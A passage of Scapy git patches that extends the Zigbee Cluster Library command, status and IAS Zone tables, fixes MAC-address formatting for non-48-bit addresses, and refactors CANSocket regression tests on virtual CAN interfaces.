Table 2.8 ZCL Command Frames _zcl_command_frames = { 0x00: "read_attributes", 0x01: "read_attributes_response", - 0x02: "write_attributes_response", + 0x02: "write_attributes", 0x03: "write_attributes_undivided", 0x04: "write_attributes_response", 0x05: "write_attributes_no_response", @@ -136,14 +137,25 @@ 0x0b: "default_response", 0x0c: "discover_attributes", 0x0d: "discover_attributes_response", - # 0x0e - 0xff Reserved + 0x0e: "read_attributes_structured", + 0x0f: "write_attributes_structured", + 0x10: "write_attributes_structured_response", + 0x11: "discover_commands_received", + 0x12: "discover_commands_received_response", + 0x13: "discover_commands_generated", + 0x14: "discover_commands_generated_response", + 0x15: "discover_attributes_extended", + 0x16: "discover_attributes_extended_response", + # 0x17 - 0xff Reserved } # ZigBee Cluster Library, Table 2.16 Enumerated Status Values _zcl_enumerated_status_values = { 0x00: "SUCCESS", - 0x02: "FAILURE", - # 0x02 - 0x7f Reserved + 0x01: "FAILURE", + # 0x02 - 0x7d Reserved + 0x7e: "NOT_AUTHORIZED", + 0x7f: "RESERVED_FIELD_NOT_ZERO", 0x80: "MALFORMED_COMMAND", 0x81: "UNSUP_CLUSTER_COMMAND", 0x82: "UNSUP_GENERAL_COMMAND", @@ -158,11 +170,25 @@ 0x8b: "NOT_FOUND", 0x8c: "UNREPORTABLE_ATTRIBUTE", 0x8d: "INVALID_DATA_TYPE", - # 0x8e - 0xbf Reserved + 0x8e: "INVALID_SELECTOR", + 0x8f: "WRITE_ONLY", + 0x90: "INCONSISTENT_STARTUP_STATE", + 0x91: "DEFINED_OUT_OF_BAND", + 0x92: "INCONSISTENT", + 0x93: "ACTION_DENIED", + 0x94: "TIMEOUT", + 0x95: "ABORT", + 0x96: "INVALID_IMAGE", + 0x97: "WAIT_FOR_DATA", + 0x98: "NO_IMAGE_AVAILABLE", + 0x99: "REQUIRE_MORE_IMAGE", + 0x9a: "NOTIFICATION_PENDING", + # 0x9b - 0xbf Reserved 0xc0: "HARDWARE_FAILURE", 0xc1: "SOFTWARE_FAILURE", 0xc2: "CALIBRATION_ERROR", - # 0xc3 - 0xff Reserved + 0xc3: "UNSUPPORTED_CLUSTER", + # 0xc4 - 0xff Reserved } # ZigBee Cluster Library, Table 2.15 Data Types @@ -239,6 +265,34 @@ 0xff: "unknown", } +# Zigbee Cluster Library, IAS Zone, Enroll Response Codes +_zcl_ias_zone_enroll_response_codes = { + 0x00: "Success", + 0x01: "Not supported", + 0x02: "No enroll permit", + 0x03: "Too many zones", +} + +# Zigbee Cluster Library, IAS Zone, Zone Types +_zcl_ias_zone_zone_types = { + 0x0000: "Standard CIE", + 0x000d: "Motion sensor", + 0x0015: "Contact switch", + 0x0028: "Fire sensor", + 0x002a: "Water sensor", + 0x002b: "Carbon Monoxide (CO) sensor", + 0x002c: "Personal emergency device", + 0x002d: "Vibration/Movement sensor", + 0x010f: "Remote Control", + 0x0115: "Key fob", + 0x021d: "Keypad", + 0x0225: "Standard Warning Device", + 0x0226: "Glass break sensor", + 0x0229: "Security repeater", + # 0x8000 - 0xfffe Manufacturer-specific types + 0xffff: "Invalid Zone Type", +} + # ZigBee # @@ -610,14 +664,14 @@ class ZigbeeAppDataPayload(Packet): # Cluster identifier (0/2 octets) ConditionalField( # unsigned short (little-endian) - EnumField("cluster", 0, _zcl_cluster_identifier, fmt=" Date: Sun, 29 Aug 2021 17:04:35 -0700 Subject: [PATCH 0634/1632] Support dynamic link layer addresses Prevents scapy from crashing on load if having a non-48-bit link layer address such as Firewire's 64-bit addresses per IEEE 1394. --- scapy/utils.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/utils.py b/scapy/utils.py index 1979495b7c9..cb58055e048 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -575,8 +575,8 @@ def valid_mac(mac): def str2mac(s): # type: (bytes) -> str if isinstance(s, str): - return ("%02x:" * 6)[:-1] % tuple(map(ord, s)) - return ("%02x:" * 6)[:-1] % tuple(s) + return ("%02x:" * len(s))[:-1] % tuple(map(ord, s)) + return ("%02x:" * len(s))[:-1] % tuple(s) def randstring(length): From b8547ca25e2a874ba93a3c0d30fbd946697576ca Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 31 Aug 2021 13:59:24 +0200 Subject: [PATCH 0635/1632] Refactoring of PythonCANSockets tests (#3317) * Refactoring of PythonCANSockets * apply feedback * minor changes * revert PythonCAN refactoring --- test/contrib/cansocket_python_can.uts | 359 +++++++++++--------------- 1 file changed, 156 insertions(+), 203 deletions(-) diff --git a/test/contrib/cansocket_python_can.uts b/test/contrib/cansocket_python_can.uts index 388e42f55f2..21c12a373b3 100644 --- a/test/contrib/cansocket_python_can.uts +++ b/test/contrib/cansocket_python_can.uts @@ -1,5 +1,5 @@ % Regression tests for the CANSocket -~ vcan_socket linux needs_root disabled +~ vcan_socket linux needs_root # More information at http://www.secdev.org/projects/UTscapy/ @@ -62,27 +62,21 @@ sock1 = None sock1 = CANSocket(bustype='socketcan', channel='vcan0') sock2 = CANSocket(bustype='socketcan', channel='vcan0') -thread = threading.Thread(target=sender, args=(sock2, CAN(identifier=0x7ff,length=1,data=b'\x01'), )) -thread.start() -send_done.wait(timeout=1) -send_done.clear() +sock2.send(CAN(identifier=0x7ff,length=1,data=b'\x01')) rx = sock1.recv() sock1.close() sock2.close() -rx == CAN(identifier=0x7ff,length=1,data=b'\x01') +assert rx == CAN(identifier=0x7ff,length=1,data=b'\x01') = CAN Socket send recv small packet test with with CANSocket(bustype='socketcan', channel='vcan0') as sock1, \ CANSocket(bustype='socketcan', channel='vcan0') as sock2: - thread = threading.Thread(target=sender, args=(sock2, CAN(identifier=0x7ff,length=1,data=b'\x01'),)) - thread.start() - send_done.wait(timeout=1) - send_done.clear() + sock2.send(CAN(identifier=0x7ff,length=1,data=b'\x01')) rx = sock1.recv() -rx == CAN(identifier=0x7ff,length=1,data=b'\x01') +assert rx == CAN(identifier=0x7ff,length=1,data=b'\x01') = CAN Socket send recv ISOTP_Packet @@ -91,37 +85,28 @@ from scapy.contrib.isotp import ISOTPHeader, ISOTP_FF with CANSocket(bustype='socketcan', channel='vcan0') as sock1, \ CANSocket(bustype='socketcan', channel='vcan0') as sock2: - thread = threading.Thread(target=sender, args=(sock2, ISOTPHeader(identifier=0x7ff)/ISOTP_FF(message_size=100, data=b'abcdef'),)) - thread.start() - send_done.wait(timeout=1) - send_done.clear() + sock2.send(ISOTPHeader(identifier=0x7ff)/ISOTP_FF(message_size=100, data=b'abcdef')) rx = sock1.recv() - rx == CAN(identifier=0x7ff,length=8,data=b'\x10\x64abcdef') + assert rx == CAN(identifier=0x7ff,length=8,data=b'\x10\x64abcdef') = CAN Socket basecls test with CANSocket(bustype='socketcan', channel='vcan0') as sock1, \ CANSocket(bustype='socketcan', channel='vcan0') as sock2: - thread = threading.Thread(target=sender, args=(sock2, CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08'),)) - thread.start() sock1.basecls = Raw - send_done.wait(timeout=1) - send_done.clear() + sock2.send(CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) rx = sock1.recv() - rx == Raw(bytes(CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08'))) + assert rx == Raw(bytes(CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08'))) = CAN Socket send recv with CANSocket(bustype='socketcan', channel='vcan0') as sock1, \ CANSocket(bustype='socketcan', channel='vcan0') as sock2: - thread = threading.Thread(target=sender, args=(sock2, CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08'),)) - thread.start() + sock2.send(CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) sock1.basecls = CAN - send_done.wait(timeout=1) - send_done.clear() rx = sock1.recv() - rx == CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08') + assert rx == CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08') = CAN Socket send recv swapped @@ -129,13 +114,10 @@ conf.contribs['CAN']['swap-bytes'] = True with CANSocket(bustype='socketcan', channel='vcan0') as sock1, \ CANSocket(bustype='socketcan', channel='vcan0') as sock2: - thread = threading.Thread(target=sender, args=(sock2, CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08'),)) - thread.start() + sock2.send(CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) sock1.basecls = CAN - send_done.wait(timeout=1) - send_done.clear() rx = sock1.recv() - rx == CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08') + assert rx == CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08') conf.contribs['CAN']['swap-bytes'] = False @@ -150,11 +132,9 @@ msgs = [CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08' with CANSocket(bustype='socketcan', channel='vcan0', can_filters=[{'can_id': 0x200, 'can_mask': 0x7ff}]) as sock1, \ CANSocket(bustype='socketcan', channel='vcan0') as sock2: - thread = threading.Thread(target=sender, args=(sock2, msgs,)) - thread.start() - send_done.wait(timeout=1) - send_done.clear() - packets = sock1.sniff(timeout=0.1) + for m in msgs: + sock2.send(m) + packets = sock1.sniff(timeout=0.1, count=3) assert len(packets) == 3 @@ -169,11 +149,9 @@ msgs = [CAN(identifier=0x212, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08' with CANSocket(bustype='socketcan', channel='vcan0', can_filters=[{'can_id': 0x200, 'can_mask': 0x700}]) as sock1, \ CANSocket(bustype='socketcan', channel='vcan0') as sock2: - thread = threading.Thread(target=sender, args=(sock2, msgs,)) - thread.start() - send_done.wait(timeout=1) - send_done.clear() - packets = sock1.sniff(timeout=0.1) + for m in msgs: + sock2.send(m) + packets = sock1.sniff(timeout=0.1, count=4) assert len(packets) == 4 = sniff with filtermask 0x0ff @@ -187,12 +165,10 @@ msgs = [CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08' with CANSocket(bustype='socketcan', channel='vcan0', can_filters=[{'can_id': 0x200, 'can_mask': 0xff}]) as sock1, \ CANSocket(bustype='socketcan', channel='vcan0') as sock2: - thread = threading.Thread(target=sender, args=(sock2, msgs,)) - thread.start() - send_done.wait(timeout=1) - send_done.clear() - packets = sock1.sniff(timeout=0.1) - len(packets) == 4 + for m in msgs: + sock2.send(m) + packets = sock1.sniff(timeout=0.1, count=4) + assert len(packets) == 4 = sniff with multiple filters @@ -206,11 +182,9 @@ msgs = [CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08' with CANSocket(bustype='socketcan', channel='vcan0', can_filters=[{'can_id': 0x200, 'can_mask': 0x7ff}, {'can_id': 0x400, 'can_mask': 0x7ff}, {'can_id': 0x600, 'can_mask': 0x7ff}, {'can_id': 0x7ff, 'can_mask': 0x7ff}]) as sock1, \ CANSocket(bustype='socketcan', channel='vcan0') as sock2: - thread = threading.Thread(target=sender, args=(sock2, msgs,)) - thread.start() - send_done.wait(timeout=1) - send_done.clear() - packets = sock1.sniff(timeout=0.1) + for m in msgs: + sock2.send(m) + packets = sock1.sniff(timeout=0.1, count=4) assert len(packets) == 4 = sniff with filtermask 0x7ff @@ -225,11 +199,9 @@ msgs = [CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08' with CANSocket(bustype='socketcan', channel='vcan0', can_filters=[{'can_id': 0x200, 'can_mask': 0x7ff}]) as sock1, \ CANSocket(bustype='socketcan', channel='vcan0') as sock2: - thread = threading.Thread(target=sender, args=(sock2, msgs,)) - thread.start() - send_done.wait(timeout=1) - send_done.clear() - packets = sock1.sniff(timeout=0.1) + for m in msgs: + sock2.send(m) + packets = sock1.sniff(timeout=0.1, count=4) assert len(packets) == 4 = sniff with filtermask 0x1FFFFFFF @@ -243,11 +215,9 @@ msgs = [CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x with CANSocket(bustype='socketcan', channel='vcan0', can_filters=[{'can_id': 0x10000000, 'can_mask': 0x1fffffff}]) as sock1, \ CANSocket(bustype='socketcan', channel='vcan0') as sock2: - thread = threading.Thread(target=sender, args=(sock2, msgs,)) - thread.start() - send_done.wait(timeout=1) - send_done.clear() - packets = sock1.sniff(timeout=0.1) + for m in msgs: + sock2.send(m) + packets = sock1.sniff(timeout=0.1, count=2) assert len(packets) == 2 @@ -255,19 +225,11 @@ with CANSocket(bustype='socketcan', channel='vcan0', can_filters=[{'can_id': 0x1 = bridge and sniff setup vcan1 package forwarding bashCommand = "/bin/bash -c 'sudo ip link add name vcan1 type vcan; sudo ip link set dev vcan1 up'" -0 == os.system(bashCommand) +assert 0 == os.system(bashCommand) sock0 = CANSocket(bustype='socketcan', channel='vcan0') sock1 = CANSocket(bustype='socketcan', channel='vcan1') -def senderVCan0(): - sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - bridgeStarted = threading.Event() def bridge(): global bridgeStarted @@ -281,35 +243,35 @@ def bridge(): return pkt bSock0.timeout = 0.01 bSock1.timeout = 0.01 - bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, xfrm21=pnr, timeout=0.5, started_callback=bridgeStarted.set) + bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, xfrm21=pnr, timeout=0.5, started_callback=bridgeStarted.set, count=6) bSock0.close() bSock1.close() threadBridge = threading.Thread(target=bridge) threadBridge.start() -threadSender = threading.Thread(target=senderVCan0) -bridgeStarted.wait() +bridgeStarted.wait(timeout=1) + +sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) -packetsVCan1 = sock1.sniff(timeout=0.5, started_callback=threadSender.start) +packetsVCan1 = sock1.sniff(timeout=0.5, count=6) assert len(packetsVCan1) == 6 sock1.close() sock0.close() threadBridge.join(timeout=3) -threadSender.join(timeout=3) +assert not threadBridge.is_alive() = bridge and sniff setup vcan0 package forwarding sock0 = CANSocket(bustype='socketcan', channel='vcan0') sock1 = CANSocket(bustype='socketcan', channel='vcan1') -def senderVCan1(): - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x80, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - bridgeStarted = threading.Event() def bridge(): global bridgeStarted @@ -319,42 +281,33 @@ def bridge(): return pkt bSock0.timeout = 0.01 bSock1.timeout = 0.01 - bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, xfrm21=pnr, timeout=0.5, started_callback=bridgeStarted.set) + bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, xfrm21=pnr, timeout=0.5, started_callback=bridgeStarted.set, count=4) bSock0.close() bSock1.close() threadBridge = threading.Thread(target=bridge) threadBridge.start() -threadSender = threading.Thread(target=senderVCan1) -bridgeStarted.wait() +bridgeStarted.wait(timeout=1) + +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x80, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) -packetsVCan0 = sock0.sniff(timeout=0.3, started_callback=threadSender.start) -len(packetsVCan0) == 4 +packetsVCan0 = sock0.sniff(timeout=0.3, count=4) +assert len(packetsVCan0) == 4 sock0.close() sock1.close() threadBridge.join(timeout=3) -threadSender.join(timeout=3) +assert not threadBridge.is_alive() =bridge and sniff setup vcan0 vcan1 package forwarding both directions sock0 = CANSocket(bustype='socketcan', channel='vcan0') sock1 = CANSocket(bustype='socketcan', channel='vcan1') - -def senderBothVCans(): - sock0.send(CAN(flags='extended', identifier=0x25, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x20, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x25, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x25, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x20, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x30, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock1.send(CAN(flags='extended', identifier=0x40, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x40, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x80, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x40, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - bridgeStarted = threading.Event() def bridge(): global bridgeStarted @@ -364,39 +317,41 @@ def bridge(): return pkt bSock0.timeout = 0.01 bSock1.timeout = 0.01 - bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, xfrm21=pnr, timeout=0.5, started_callback=bridgeStarted.set) + bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, xfrm21=pnr, timeout=0.5, started_callback=bridgeStarted.set, count=10) bSock0.close() bSock1.close() threadBridge = threading.Thread(target=bridge) threadBridge.start() -threadSender = threading.Thread(target=senderBothVCans) -bridgeStarted.wait() - -packetsVCan0 = sock0.sniff(timeout=0.3, started_callback=threadSender.start) -packetsVCan1 = sock1.sniff(timeout=0.3) -len(packetsVCan0) == 4 -len(packetsVCan1) == 6 +bridgeStarted.wait(timeout=1) + +sock0.send(CAN(flags='extended', identifier=0x25, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x20, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x25, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x25, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x20, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x30, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock1.send(CAN(flags='extended', identifier=0x40, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x40, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x80, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x40, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) + +packetsVCan0 = sock0.sniff(timeout=0.3, count=4) +packetsVCan1 = sock1.sniff(timeout=0.3, count=6) +assert len(packetsVCan0) == 4 +assert len(packetsVCan1) == 6 sock0.close() sock1.close() threadBridge.join(timeout=3) -threadSender.join(timeout=3) +assert not threadBridge.is_alive() =bridge and sniff setup vcan1 package change sock0 = CANSocket(bustype='socketcan', channel='vcan0') sock1 = CANSocket(bustype='socketcan', channel='vcan1', can_filters=[{'can_id': 0x10010000, 'can_mask': 0x1fffffff}]) -def senderVCan0(): - sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - bridgeStarted = threading.Event() def bridgeWithPackageChangeVCan0ToVCan1(): global bridgeStarted @@ -408,35 +363,34 @@ def bridgeWithPackageChangeVCan0ToVCan1(): return pkt bSock0.timeout = 0.01 bSock1.timeout = 0.01 - bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, timeout=0.5, started_callback=bridgeStarted.set) + bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, timeout=0.5, started_callback=bridgeStarted.set, count=6) bSock0.close() bSock1.close() threadBridge = threading.Thread(target=bridgeWithPackageChangeVCan0ToVCan1) threadBridge.start() -threadSender = threading.Thread(target=senderVCan0) -bridgeStarted.wait() - -packetsVCan1 = sock1.sniff(timeout=0.3, started_callback=threadSender.start) -len(packetsVCan1) == 6 +bridgeStarted.wait(timeout=1) +sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) + +packetsVCan1 = sock1.sniff(timeout=0.3, count=6) +assert len(packetsVCan1) == 6 sock0.close() sock1.close() threadBridge.join(timeout=3) -threadSender.join(timeout=3) +assert not threadBridge.is_alive() =bridge and sniff setup vcan0 package change sock1 = CANSocket(bustype='socketcan', channel='vcan1') sock0 = CANSocket(bustype='socketcan', channel='vcan0', can_filters=[{'can_id': 0x10010000, 'can_mask': 0x1fffffff}]) -def senderVCan1(): - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10050000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - bridgeStarted = threading.Event() def bridgeWithPackageChangeVCan1ToVCan0(): global bridgeStarted @@ -448,41 +402,33 @@ def bridgeWithPackageChangeVCan1ToVCan0(): return pkt bSock0.timeout = 0.01 bSock1.timeout = 0.01 - bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm21=pnr, timeout=0.5, started_callback=bridgeStarted.set) + bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm21=pnr, timeout=0.5, started_callback=bridgeStarted.set, count=4) bSock0.close() bSock1.close() threadBridge = threading.Thread(target=bridgeWithPackageChangeVCan1ToVCan0) threadBridge.start() -threadSender = threading.Thread(target=senderVCan1) -bridgeStarted.wait() +bridgeStarted.wait(timeout=1) + +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10050000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) -packetsVCan0 = sock0.sniff(timeout=0.3, started_callback=threadSender.start) -len(packetsVCan0) == 4 +packetsVCan0 = sock0.sniff(timeout=0.3, count=4) +assert len(packetsVCan0) == 4 sock0.close() sock1.close() threadBridge.join(timeout=3) -threadSender.join(timeout=3) +assert not threadBridge.is_alive() =bridge and sniff setup vcan0 and vcan1 package change in both directions sock0 = CANSocket(bustype='socketcan', channel='vcan0', can_filters=[{'can_id': 0x10010000, 'can_mask': 0x1fffffff}]) sock1 = CANSocket(bustype='socketcan', channel='vcan1', can_filters=[{'can_id': 0x10010000, 'can_mask': 0x1fffffff}]) -def senderBothVCans(): - sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10050000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - bridgeStarted = threading.Event() def bridgeWithPackageChangeBothDirections(): global bridgeStarted @@ -494,39 +440,41 @@ def bridgeWithPackageChangeBothDirections(): return pkt bSock0.timeout = 0.01 bSock1.timeout = 0.01 - bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, xfrm21=pnr, timeout=0.5, started_callback=bridgeStarted.set) + bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, xfrm21=pnr, timeout=0.5, started_callback=bridgeStarted.set, count=10) bSock0.close() bSock1.close() threadBridge = threading.Thread(target=bridgeWithPackageChangeBothDirections) threadBridge.start() -threadSender = threading.Thread(target=senderBothVCans) -bridgeStarted.wait() - -packetsVCan0 = sock0.sniff(timeout=0.3, started_callback=threadSender.start) -packetsVCan1 = sock1.sniff(timeout=0.3) -len(packetsVCan0) == 4 -len(packetsVCan1) == 6 +bridgeStarted.wait(timeout=1) + +sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10050000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, 